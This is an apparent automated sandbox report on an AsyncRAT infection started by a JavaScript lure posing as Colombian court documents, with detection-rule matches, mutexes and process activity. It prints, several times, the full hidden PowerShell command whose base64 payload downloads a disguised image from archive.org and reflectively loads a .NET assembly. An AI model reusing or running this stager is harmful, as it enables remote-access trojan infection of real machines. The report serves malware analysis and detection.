              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawB
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DB728592_2_00007FFC3DB72859
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DB712C72_2_00007FFC3DB712C7
              Source: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).jsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3430
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3430Jump to behavior
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
              Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
              Source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, Settings.csBase64 encoded string: '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
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@9/3@5/4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3rbvho3.eoz.ps1Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).jsVirustotal: Detection: 31%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBn